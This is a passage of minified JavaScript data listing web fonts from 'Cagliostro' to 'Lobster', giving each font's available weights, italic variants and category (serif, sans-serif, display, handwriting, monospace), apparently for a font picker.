Dressing",v:[400],f:"display"},{n:"Cagliostro",v:[400],f:"sans-serif"},{n:"Cairo",v:["200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Caladea",v:[400,"400i",700,"700i"],f:"serif"},{n:"Calistoga",v:[400],f:"display"},{n:"Calligraffitti",v:[400],f:"handwriting"},{n:"Cambay",v:[400,"400i",700,"700i"],f:"sans-serif"},{n:"Cambo",v:[400],f:"serif"},{n:"Candal",v:[400],f:"sans-serif"},{n:"Cantarell",v:[400,"400i",700,"700i"],f:"sans-serif"},{n:"Cantata One",v:[400],f:"serif"},{n:"Cantora One",v:[400],f:"sans-serif"},{n:"Capriola",v:[400],f:"sans-serif"},{n:"Caramel",v:[400],f:"handwriting"},{n:"Carattere",v:[400],f:"handwriting"},{n:"Cardo",v:[400,"400i",700],f:"serif"},{n:"Carme",v:[400],f:"sans-serif"},{n:"Carrois Gothic",v:[400],f:"sans-serif"},{n:"Carrois Gothic SC",v:[400],f:"sans-serif"},{n:"Carter One",v:[400],f:"display"},{n:"Castoro",v:[400,"400i"],f:"serif"},{n:"Catamaran",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Caudex",v:[400,"400i",700,"700i"],f:"serif"},{n:"Caveat",v:[400,500,600,700],f:"handwriting"},{n:"Caveat Brush",v:[400],f:"handwriting"},{n:"Cedarville Cursive",v:[400],f:"handwriting"},{n:"Ceviche One",v:[400],f:"display"},{n:"Chakra Petch",v:["300","300i",400,"400i",500,"500i",600,"600i",700,"700i"],f:"sans-serif"},{n:"Changa",v:["200","300",400,500,600,700,800],f:"sans-serif"},{n:"Changa One",v:[400,"400i"],f:"display"},{n:"Chango",v:[400],f:"display"},{n:"Charm",v:[400,700],f:"handwriting"},{n:"Charmonman",v:[400,700],f:"handwriting"},{n:"Chathura",v:["100","300",400,700,800],f:"sans-serif"},{n:"Chau Philomene One",v:[400,"400i"],f:"sans-serif"},{n:"Chela One",v:[400],f:"display"},{n:"Chelsea Market",v:[400],f:"display"},{n:"Chenla",v:[400],f:"display"},{n:"Cherish",v:[400],f:"handwriting"},{n:"Cherry Cream Soda",v:[400],f:"display"},{n:"Cherry Swash",v:[400,700],f:"display"},{n:"Chewy",v:[400],f:"display"},{n:"Chicle",v:[400],f:"display"},{n:"Chilanka",v:[400],f:"handwriting"},{n:"Chivo",v:[100,200,300,400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Chonburi",v:[400],f:"display"},{n:"Cinzel",v:[400,500,600,700,800,900],f:"serif"},{n:"Cinzel Decorative",v:[400,700,900],f:"display"},{n:"Clicker Script",v:[400],f:"handwriting"},{n:"Coda",v:[400,800],f:"display"},{n:"Coda Caption",v:[800],f:"sans-serif"},{n:"Codystar",v:["300",400],f:"display"},{n:"Coiny",v:[400],f:"display"},{n:"Combo",v:[400],f:"display"},{n:"Comfortaa",v:["300",400,500,600,700],f:"display"},{n:"Comforter",v:[400],f:"handwriting"},{n:"Comforter Brush",v:[400],f:"handwriting"},{n:"Comic Neue",v:["300","300i",400,"400i",700,"700i"],f:"handwriting"},{n:"Coming Soon",v:[400],f:"handwriting"},{n:"Commissioner",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Concert One",v:[400],f:"display"},{n:"Condiment",v:[400],f:"handwriting"},{n:"Content",v:[400,700],f:"display"},{n:"Contrail One",v:[400],f:"display"},{n:"Convergence",v:[400],f:"sans-serif"},{n:"Cookie",v:[400],f:"handwriting"},{n:"Copse",v:[400],f:"serif"},{n:"Corben",v:[400,700],f:"display"},{n:"Corinthia",v:[400,700],f:"handwriting"},{n:"Cormorant",v:[300,400,500,600,700,"300i","400i","500i","600i","700i"],f:"serif"},{n:"Cormorant Garamond",v:["300","300i",400,"400i",500,"500i",600,"600i",700,"700i"],f:"serif"},{n:"Cormorant Infant",v:["300","300i",400,"400i",500,"500i",600,"600i",700,"700i"],f:"serif"},{n:"Cormorant SC",v:["300",400,500,600,700],f:"serif"},{n:"Cormorant Unicase",v:["300",400,500,600,700],f:"serif"},{n:"Cormorant Upright",v:["300",400,500,600,700],f:"serif"},{n:"Courgette",v:[400],f:"handwriting"},{n:"Courier Prime",v:[400,"400i",700,"700i"],f:"monospace"},{n:"Cousine",v:[400,"400i",700,"700i"],f:"monospace"},{n:"Coustard",v:[400,900],f:"serif"},{n:"Covered By Your Grace",v:[400],f:"handwriting"},{n:"Crafty Girls",v:[400],f:"handwriting"},{n:"Creepster",v:[400],f:"display"},{n:"Crete Round",v:[400,"400i"],f:"serif"},{n:"Crimson Pro",v:["200","300",400,500,600,700,800,900,"200i","300i","400i","500i","600i","700i","800i","900i"],f:"serif"},{n:"Croissant One",v:[400],f:"display"},{n:"Crushed",v:[400],f:"display"},{n:"Cuprum",v:[400,500,600,700,"400i","500i","600i","700i"],f:"sans-serif"},{n:"Cute Font",v:[400],f:"display"},{n:"Cutive",v:[400],f:"serif"},{n:"Cutive Mono",v:[400],f:"monospace"},{n:"Cairo Play",v:[200,300,400,500,600,700,800,900],f:"sans-serif"},{n:"Carlito",v:[400,"400i",700,"700i"],f:"sans-serif"},{n:"Castoro Titling",v:[400],f:"display"},{n:"Charis SIL",v:[400,"400i",700,"700i"],f:"serif"},{n:"Cherry Bomb One",v:[400],f:"display"},{n:"Chivo Mono",v:[100,200,300,400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"monospace"},{n:"Chokokutai",v:[400],f:"display"},{n:"Climate Crisis",v:[400],f:"display"},{n:"Comme",v:[100,200,300,400,500,600,700,800,900],f:"sans-serif"},{n:"Crimson Text",v:[400,"400i",600,"600i",700,"700i"],f:"serif"},{n:"DM Mono",v:["300","300i",400,"400i",500,"500i"],f:"monospace"},{n:"DM Sans",v:[400,"400i",500,"500i",700,"700i"],f:"sans-serif"},{n:"DM Serif Display",v:[400,"400i"],f:"serif"},{n:"DM Serif Text",v:[400,"400i"],f:"serif"},{n:"Damion",v:[400],f:"handwriting"},{n:"Dancing Script",v:[400,500,600,700],f:"handwriting"},{n:"Dangrek",v:[400],f:"display"},{n:"Darker Grotesque",v:["300",400,500,600,700,800,900],f:"sans-serif"},{n:"David Libre",v:[400,500,700],f:"serif"},{n:"Dawning of a New Day",v:[400],f:"handwriting"},{n:"Days One",v:[400],f:"sans-serif"},{n:"Dekko",v:[400],f:"handwriting"},{n:"Dela Gothic One",v:[400],f:"display"},{n:"Delius",v:[400],f:"handwriting"},{n:"Delius Swash Caps",v:[400],f:"handwriting"},{n:"Delius Unicase",v:[400,700],f:"handwriting"},{n:"Della Respira",v:[400],f:"serif"},{n:"Denk One",v:[400],f:"sans-serif"},{n:"Devonshire",v:[400],f:"handwriting"},{n:"Dhurjati",v:[400],f:"sans-serif"},{n:"Didact Gothic",v:[400],f:"sans-serif"},{n:"Diplomata",v:[400],f:"display"},{n:"Diplomata SC",v:[400],f:"display"},{n:"Do Hyeon",v:[400],f:"sans-serif"},{n:"Dokdo",v:[400],f:"handwriting"},{n:"Domine",v:[400,500,600,700],f:"serif"},{n:"Donegal One",v:[400],f:"serif"},{n:"Dongle",v:["300",400,700],f:"sans-serif"},{n:"Doppio One",v:[400],f:"sans-serif"},{n:"Dorsa",v:[400],f:"sans-serif"},{n:"Dosis",v:["200","300",400,500,600,700,800],f:"sans-serif"},{n:"DotGothic16",v:[400],f:"sans-serif"},{n:"Dr Sugiyama",v:[400],f:"handwriting"},{n:"Duru Sans",v:[400],f:"sans-serif"},{n:"Dynalight",v:[400],f:"display"},{n:"Darumadrop One",v:[400],f:"display"},{n:"Delicious Handrawn",v:[400],f:"handwriting"},{n:"DynaPuff",v:[400,500,600,700],f:"display"},{n:"Edu NSW ACT Foundation",v:[400,500,600,700],f:"handwriting"},{n:"EB Garamond",v:[400,500,600,700,800,"400i","500i","600i","700i","800i"],f:"serif"},{n:"Eagle Lake",v:[400],f:"handwriting"},{n:"East Sea Dokdo",v:[400],f:"handwriting"},{n:"Eater",v:[400],f:"display"},{n:"Economica",v:[400,"400i",700,"700i"],f:"sans-serif"},{n:"Eczar",v:[400,500,600,700,800],f:"serif"},{n:"El Messiri",v:[400,500,600,700],f:"sans-serif"},{n:"Electrolize",v:[400],f:"sans-serif"},{n:"Elsie",v:[400,900],f:"display"},{n:"Elsie Swash Caps",v:[400,900],f:"display"},{n:"Emblema One",v:[400],f:"display"},{n:"Emilys Candy",v:[400],f:"display"},{n:"Encode Sans",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Encode Sans Condensed",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Encode Sans Expanded",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Encode Sans SC",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Encode Sans Semi Condensed",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Encode Sans Semi Expanded",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Engagement",v:[400],f:"handwriting"},{n:"Englebert",v:[400],f:"sans-serif"},{n:"Enriqueta",v:[400,500,600,700],f:"serif"},{n:"Ephesis",v:[400],f:"handwriting"},{n:"Epilogue",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Erica One",v:[400],f:"display"},{n:"Esteban",v:[400],f:"serif"},{n:"Estonia",v:[400],f:"handwriting"},{n:"Euphoria Script",v:[400],f:"handwriting"},{n:"Ewert",v:[400],f:"display"},{n:"Exo",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Exo 2",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Expletus Sans",v:[400,500,600,700,"400i","500i","600i","700i"],f:"display"},{n:"Explora",v:[400],f:"handwriting"},{n:"Edu QLD Beginner",v:[400,500,600,700],f:"handwriting"},{n:"Edu SA Beginner",v:[400,500,600,700],f:"handwriting"},{n:"Edu TAS Beginner",v:[400,500,600,700],f:"handwriting"},{n:"Edu VIC WA NT Beginner",v:[400,500,600,700],f:"handwriting"},{n:"Fahkwang",v:["200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i"],f:"sans-serif"},{n:"Familjen Grotesk",v:[400,500,600,700,"400i","500i","600i","700i"],f:"sans-serif"},{n:"Fanwood Text",v:[400,"400i"],f:"serif"},{n:"Farro",v:["300",400,500,700],f:"sans-serif"},{n:"Farsan",v:[400],f:"display"},{n:"Fascinate",v:[400],f:"display"},{n:"Fascinate Inline",v:[400],f:"display"},{n:"Faster One",v:[400],f:"display"},{n:"Fasthand",v:[400],f:"display"},{n:"Fauna One",v:[400],f:"serif"},{n:"Faustina",v:["300",400,500,600,700,800,"300i","400i","500i","600i","700i","800i"],f:"serif"},{n:"Federant",v:[400],f:"display"},{n:"Federo",v:[400],f:"sans-serif"},{n:"Felipa",v:[400],f:"handwriting"},{n:"Fenix",v:[400],f:"serif"},{n:"Festive",v:[400],f:"handwriting"},{n:"Finger Paint",v:[400],f:"display"},{n:"Fira Code",v:["300",400,500,600,700],f:"monospace"},{n:"Fira Mono",v:[400,500,700],f:"monospace"},{n:"Fira Sans",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i",900,"900i"],f:"sans-serif"},{n:"Fira Sans Condensed",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i",900,"900i"],f:"sans-serif"},{n:"Fira Sans Extra Condensed",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i",900,"900i"],f:"sans-serif"},{n:"Fjalla One",v:[400],f:"sans-serif"},{n:"Fjord One",v:[400],f:"serif"},{n:"Flamenco",v:["300",400],f:"display"},{n:"Flavors",v:[400],f:"display"},{n:"Fleur De Leah",v:[400],f:"handwriting"},{n:"Flow Block",v:[400],f:"display"},{n:"Flow Circular",v:[400],f:"display"},{n:"Flow Rounded",v:[400],f:"display"},{n:"Fondamento",v:[400,"400i"],f:"handwriting"},{n:"Fontdiner Swanky",v:[400],f:"display"},{n:"Forum",v:[400],f:"display"},{n:"Francois One",v:[400],f:"sans-serif"},{n:"Frank Ruhl Libre",v:["300",400,500,600,700,800,900],f:"serif"},{n:"Fraunces",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"serif"},{n:"Freckle Face",v:[400],f:"display"},{n:"Fredericka the Great",v:[400],f:"display"},{n:"Fredoka",v:["300",400,500,600,700],f:"sans-serif"},{n:"Freehand",v:[400],f:"display"},{n:"Fresca",v:[400],f:"sans-serif"},{n:"Frijole",v:[400],f:"display"},{n:"Fruktur",v:[400,"400i"],f:"display"},{n:"Fugaz One",v:[400],f:"display"},{n:"Fuggles",v:[400],f:"handwriting"},{n:"Fuzzy Bubbles",v:[400,700],f:"handwriting"},{n:"Figtree",v:[300,400,500,600,700,800,900,"300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Finlandica",v:[400,500,600,700,"400i","500i","600i","700i"],f:"sans-serif"},{n:"Foldit",v:[100,200,300,400,500,600,700,800,900],f:"display"},{n:"Fragment Mono",v:[400,"400i"],f:"monospace"},{n:"GFS Didot",v:[400],f:"serif"},{n:"GFS Neohellenic",v:[400,"400i",700,"700i"],f:"sans-serif"},{n:"Gabriela",v:[400],f:"serif"},{n:"Gaegu",v:["300",400,700],f:"handwriting"},{n:"Gafata",v:[400],f:"sans-serif"},{n:"Galada",v:[400],f:"display"},{n:"Galdeano",v:[400],f:"sans-serif"},{n:"Galindo",v:[400],f:"display"},{n:"Gamja Flower",v:[400],f:"handwriting"},{n:"Gayathri",v:["100",400,700],f:"sans-serif"},{n:"Gelasio",v:[400,"400i",500,"500i",600,"600i",700,"700i"],f:"serif"},{n:"Gemunu Libre",v:["200","300",400,500,600,700,800],f:"sans-serif"},{n:"Genos",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Geo",v:[400,"400i"],f:"sans-serif"},{n:"Georama",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Geostar",v:[400],f:"display"},{n:"Geostar Fill",v:[400],f:"display"},{n:"Germania One",v:[400],f:"display"},{n:"Gideon Roman",v:[400],f:"display"},{n:"Gidugu",v:[400],f:"sans-serif"},{n:"Gilda Display",v:[400],f:"serif"},{n:"Girassol",v:[400],f:"display"},{n:"Give You Glory",v:[400],f:"handwriting"},{n:"Glass Antiqua",v:[400],f:"display"},{n:"Glegoo",v:[400,700],f:"serif"},{n:"Gloria Hallelujah",v:[400],f:"handwriting"},{n:"Glory",v:["100","200","300",400,500,600,700,800,"100i","200i","300i","400i","500i","600i","700i","800i"],f:"sans-serif"},{n:"Gluten",v:["100","200","300",400,500,600,700,800,900],f:"display"},{n:"Goblin One",v:[400],f:"display"},{n:"Gochi Hand",v:[400],f:"handwriting"},{n:"Goldman",v:[400,700],f:"display"},{n:"Gorditas",v:[400,700],f:"display"},{n:"Gothic A1",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Gotu",v:[400],f:"sans-serif"},{n:"Goudy Bookletter 1911",v:[400],f:"serif"},{n:"Gowun Batang",v:[400,700],f:"serif"},{n:"Gowun Dodum",v:[400],f:"sans-serif"},{n:"Graduate",v:[400],f:"display"},{n:"Grand Hotel",v:[400],f:"handwriting"},{n:"Grandstander",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"display"},{n:"Grape Nuts",v:[400],f:"handwriting"},{n:"Gravitas One",v:[400],f:"display"},{n:"Great Vibes",v:[400],f:"handwriting"},{n:"Grechen Fuemen",v:[400],f:"handwriting"},{n:"Grenze",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i",900,"900i"],f:"serif"},{n:"Grenze Gotisch",v:["100","200","300",400,500,600,700,800,900],f:"display"},{n:"Grey Qo",v:[400],f:"handwriting"},{n:"Griffy",v:[400],f:"display"},{n:"Gruppo",v:[400],f:"sans-serif"},{n:"Gudea",v:[400,"400i",700],f:"sans-serif"},{n:"Gugi",v:[400],f:"display"},{n:"Gupter",v:[400,500,700],f:"serif"},{n:"Gurajada",v:[400],f:"serif"},{n:"Gwendolyn",v:[400,700],f:"handwriting"},{n:"Gajraj One",v:[400],f:"display"},{n:"Gantari",v:[100,200,300,400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Gloock",v:[400],f:"serif"},{n:"Golos Text",v:[400,500,600,700,800,900],f:"sans-serif"},{n:"Gulzar",v:[400],f:"serif"},{n:"Gentium Book Plus",v:[400,"400i",700,"700i"],f:"serif"},{n:"Gentium Plus",v:[400,"400i",700,"700i"],f:"serif"},{n:"Habibi",v:[400],f:"serif"},{n:"Hachi Maru Pop",v:[400],f:"handwriting"},{n:"Hahmlet",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Halant",v:["300",400,500,600,700],f:"serif"},{n:"Hammersmith One",v:[400],f:"sans-serif"},{n:"Hanalei",v:[400],f:"display"},{n:"Hanalei Fill",v:[400],f:"display"},{n:"Handlee",v:[400],f:"handwriting"},{n:"Hanuman",v:["100","300",400,700,900],f:"serif"},{n:"Happy Monkey",v:[400],f:"display"},{n:"Harmattan",v:[400,500,600,700],f:"sans-serif"},{n:"Headland One",v:[400],f:"serif"},{n:"Heebo",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Henny Penny",v:[400],f:"display"},{n:"Hepta Slab",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Herr Von Muellerhoff",v:[400],f:"handwriting"},{n:"Hi Melody",v:[400],f:"handwriting"},{n:"Hina Mincho",v:[400],f:"serif"},{n:"Hind",v:["300",400,500,600,700],f:"sans-serif"},{n:"Hind Guntur",v:["300",400,500,600,700],f:"sans-serif"},{n:"Hind Madurai",v:["300",400,500,600,700],f:"sans-serif"},{n:"Hind Siliguri",v:["300",400,500,600,700],f:"sans-serif"},{n:"Hind Vadodara",v:["300",400,500,600,700],f:"sans-serif"},{n:"Holtwood One SC",v:[400],f:"serif"},{n:"Homemade Apple",v:[400],f:"handwriting"},{n:"Homenaje",v:[400],f:"sans-serif"},{n:"Hubballi",v:[400],f:"display"},{n:"Hurricane",v:[400],f:"handwriting"},{n:"Hanken Grotesk",v:[100,200,300,400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"IBM Plex Mono",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i"],f:"monospace"},{n:"IBM Plex Sans",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i"],f:"sans-serif"},{n:"IBM Plex Sans Arabic",v:["100","200","300",400,500,600,700],f:"sans-serif"},{n:"IBM Plex Sans Condensed",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i"],f:"sans-serif"},{n:"IBM Plex Sans Devanagari",v:["100","200","300",400,500,600,700],f:"sans-serif"},{n:"IBM Plex Sans Hebrew",v:["100","200","300",400,500,600,700],f:"sans-serif"},{n:"IBM Plex Sans KR",v:["100","200","300",400,500,600,700],f:"sans-serif"},{n:"IBM Plex Sans Thai",v:["100","200","300",400,500,600,700],f:"sans-serif"},{n:"IBM Plex Sans Thai Looped",v:["100","200","300",400,500,600,700],f:"sans-serif"},{n:"IBM Plex Serif",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i"],f:"serif"},{n:"IM Fell DW Pica",v:[400,"400i"],f:"serif"},{n:"IM Fell DW Pica SC",v:[400],f:"serif"},{n:"IM Fell Double Pica",v:[400,"400i"],f:"serif"},{n:"IM Fell Double Pica SC",v:[400],f:"serif"},{n:"IM Fell English",v:[400,"400i"],f:"serif"},{n:"IM Fell English SC",v:[400],f:"serif"},{n:"IM Fell French Canon",v:[400,"400i"],f:"serif"},{n:"IM Fell French Canon SC",v:[400],f:"serif"},{n:"IM Fell Great Primer",v:[400,"400i"],f:"serif"},{n:"IM Fell Great Primer SC",v:[400],f:"serif"},{n:"Ibarra Real Nova",v:[400,500,600,700,"400i","500i","600i","700i"],f:"serif"},{n:"Iceberg",v:[400],f:"display"},{n:"Iceland",v:[400],f:"display"},{n:"Imbue",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Imperial Script",v:[400],f:"handwriting"},{n:"Imprima",v:[400],f:"sans-serif"},{n:"Inconsolata",v:["200","300",400,500,600,700,800,900],f:"monospace"},{n:"Inder",v:[400],f:"sans-serif"},{n:"Indie Flower",v:[400],f:"handwriting"},{n:"Ingrid Darling",v:[400],f:"handwriting"},{n:"Inika",v:[400,700],f:"serif"},{n:"Inknut Antiqua",v:["300",400,500,600,700,800,900],f:"serif"},{n:"Inria Sans",v:["300","300i",400,"400i",700,"700i"],f:"sans-serif"},{n:"Inria Serif",v:["300","300i",400,"400i",700,"700i"],f:"serif"},{n:"Inspiration",v:[400],f:"handwriting"},{n:"Inter",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Irish Grover",v:[400],f:"display"},{n:"Island Moments",v:[400],f:"handwriting"},{n:"Istok Web",v:[400,"400i",700,"700i"],f:"sans-serif"},{n:"Italiana",v:[400],f:"serif"},{n:"Italianno",v:[400],f:"handwriting"},{n:"Itim",v:[400],f:"handwriting"},{n:"IBM Plex Sans JP",v:[100,200,300,400,500,600,700],f:"sans-serif"},{n:"Instrument Sans",v:[400,500,600,700,"400i","500i","600i","700i"],f:"sans-serif"},{n:"Instrument Serif",v:[400,"400i"],f:"serif"},{n:"Inter Tight",v:[100,200,300,400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Jacques Francois",v:[400],f:"serif"},{n:"Jacques Francois Shadow",v:[400],f:"display"},{n:"Jaldi",v:[400,700],f:"sans-serif"},{n:"JetBrains Mono",v:["100","200","300",400,500,600,700,800,"100i","200i","300i","400i","500i","600i","700i","800i"],f:"monospace"},{n:"Jim Nightshade",v:[400],f:"handwriting"},{n:"Jockey One",v:[400],f:"sans-serif"},{n:"Jolly Lodger",v:[400],f:"display"},{n:"Jomhuria",v:[400],f:"display"},{n:"Jomolhari",v:[400],f:"serif"},{n:"Josefin Sans",v:["100","200","300",400,500,600,700,"100i","200i","300i","400i","500i","600i","700i"],f:"sans-serif"},{n:"Josefin Slab",v:["100","200","300",400,500,600,700,"100i","200i","300i","400i","500i","600i","700i"],f:"serif"},{n:"Jost",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Joti One",v:[400],f:"display"},{n:"Jua",v:[400],f:"sans-serif"},{n:"Judson",v:[400,"400i",700],f:"serif"},{n:"Julee",v:[400],f:"handwriting"},{n:"Julius Sans One",v:[400],f:"sans-serif"},{n:"Junge",v:[400],f:"serif"},{n:"Jura",v:["300",400,500,600,700],f:"sans-serif"},{n:"Just Another Hand",v:[400],f:"handwriting"},{n:"Just Me Again Down Here",v:[400],f:"handwriting"},{n:"K2D",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i"],f:"sans-serif"},{n:"Joan",v:[400],f:"serif"},{n:"Kadwa",v:[400,700],f:"serif"},{n:"Kaisei Decol",v:[400,500,700],f:"serif"},{n:"Kaisei HarunoUmi",v:[400,500,700],f:"serif"},{n:"Kaisei Opti",v:[400,500,700],f:"serif"},{n:"Kaisei Tokumin",v:[400,500,700,800],f:"serif"},{n:"Kalam",v:["300",400,700],f:"handwriting"},{n:"Kameron",v:[400,700],f:"serif"},{n:"Kanit",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i",900,"900i"],f:"sans-serif"},{n:"Karantina",v:["300",400,700],f:"display"},{n:"Karla",v:["200","300",400,500,600,700,800,"200i","300i","400i","500i","600i","700i","800i"],f:"sans-serif"},{n:"Karma",v:["300",400,500,600,700],f:"serif"},{n:"Katibeh",v:[400],f:"display"},{n:"Kaushan Script",v:[400],f:"handwriting"},{n:"Kavivanar",v:[400],f:"handwriting"},{n:"Kavoon",v:[400],f:"display"},{n:"Keania One",v:[400],f:"display"},{n:"Kelly Slab",v:[400],f:"display"},{n:"Kenia",v:[400],f:"display"},{n:"Khand",v:["300",400,500,600,700],f:"sans-serif"},{n:"Khmer",v:[400],f:"display"},{n:"Khula",v:["300",400,600,700,800],f:"sans-serif"},{n:"Kings",v:[400],f:"handwriting"},{n:"Kirang Haerang",v:[400],f:"display"},{n:"Kite One",v:[400],f:"sans-serif"},{n:"Kiwi Maru",v:["300",400,500],f:"serif"},{n:"Klee One",v:[400,600],f:"handwriting"},{n:"Knewave",v:[400],f:"display"},{n:"KoHo",v:["200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i"],f:"sans-serif"},{n:"Kodchasan",v:["200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i"],f:"sans-serif"},{n:"Koh Santepheap",v:["100","300",400,700,900],f:"display"},{n:"Kolker Brush",v:[400],f:"handwriting"},{n:"Kosugi",v:[400],f:"sans-serif"},{n:"Kosugi Maru",v:[400],f:"sans-serif"},{n:"Kotta One",v:[400],f:"serif"},{n:"Koulen",v:[400],f:"display"},{n:"Kranky",v:[400],f:"display"},{n:"Kreon",v:["300",400,500,600,700],f:"serif"},{n:"Kristi",v:[400],f:"handwriting"},{n:"Krona One",v:[400],f:"sans-serif"},{n:"Krub",v:["200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i"],f:"sans-serif"},{n:"Kufam",v:[400,500,600,700,800,900,"400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Kulim Park",v:["200","200i","300","300i",400,"400i",600,"600i",700,"700i"],f:"sans-serif"},{n:"Kumar One",v:[400],f:"display"},{n:"Kumar One Outline",v:[400],f:"display"},{n:"Kumbh Sans",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Kurale",v:[400],f:"serif"},{n:"Kantumruy Pro",v:[100,200,300,400,500,600,700,"100i","200i","300i","400i","500i","600i","700i"],f:"sans-serif"},{n:"Kdam Thmor Pro",v:[400],f:"sans-serif"},{n:"Konkhmer Sleokchher",v:[400],f:"display"},{n:"La Belle Aurore",v:[400],f:"handwriting"},{n:"Lacquer",v:[400],f:"display"},{n:"Laila",v:["300",400,500,600,700],f:"sans-serif"},{n:"Lakki Reddy",v:[400],f:"handwriting"},{n:"Lalezar",v:[400],f:"display"},{n:"Lancelot",v:[400],f:"display"},{n:"Langar",v:[400],f:"display"},{n:"Lateef",v:[200,300,400,500,600,700,800],f:"handwriting"},{n:"Lato",v:["100","100i","300","300i",400,"400i",700,"700i",900,"900i"],f:"sans-serif"},{n:"Lavishly Yours",v:[400],f:"handwriting"},{n:"League Gothic",v:[400],f:"sans-serif"},{n:"League Script",v:[400],f:"handwriting"},{n:"League Spartan",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Leckerli One",v:[400],f:"handwriting"},{n:"Ledger",v:[400],f:"serif"},{n:"Lekton",v:[400,"400i",700],f:"sans-serif"},{n:"Lemon",v:[400],f:"display"},{n:"Lemonada",v:["300",400,500,600,700],f:"display"},{n:"Lexend",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Lexend Deca",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Lexend Exa",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Lexend Giga",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Lexend Mega",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Lexend Peta",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Lexend Tera",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Lexend Zetta",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Libre Barcode 128",v:[400],f:"display"},{n:"Libre Barcode 128 Text",v:[400],f:"display"},{n:"Libre Barcode 39",v:[400],f:"display"},{n:"Libre Barcode 39 Extended",v:[400],f:"display"},{n:"Libre Barcode 39 Extended Text",v:[400],f:"display"},{n:"Libre Barcode 39 Text",v:[400],f:"display"},{n:"Libre Barcode EAN13 Text",v:[400],f:"display"},{n:"Libre Baskerville",v:[400,"400i",700],f:"serif"},{n:"Libre Bodoni",v:[400,500,600,700,"400i","500i","600i","700i"],f:"serif"},{n:"Libre Caslon Display",v:[400],f:"serif"},{n:"Libre Caslon Text",v:[400,"400i",700],f:"serif"},{n:"Libre Franklin",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Licorice",v:[400],f:"handwriting"},{n:"Life Savers",v:[400,700,800],f:"display"},{n:"Lilita One",v:[400],f:"display"},{n:"Lily Script One",v:[400],f:"display"},{n:"Limelight",v:[400],f:"display"},{n:"Linden Hill",v:[400,"400i"],f:"serif"},{n:"Literata",v:["200","300",400,500,600,700,800,900,"200i","300i","400i","500i","600i","700i","800i","900i"],f:"serif"},{n:"Liu Jian Mao Cao",v:[400],f:"handwriting"},{n:"Livvic",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",900,"900i"],f:"sans-serif"},{n:"Lobster",v:[400],f:"display"},{n:"Lobster 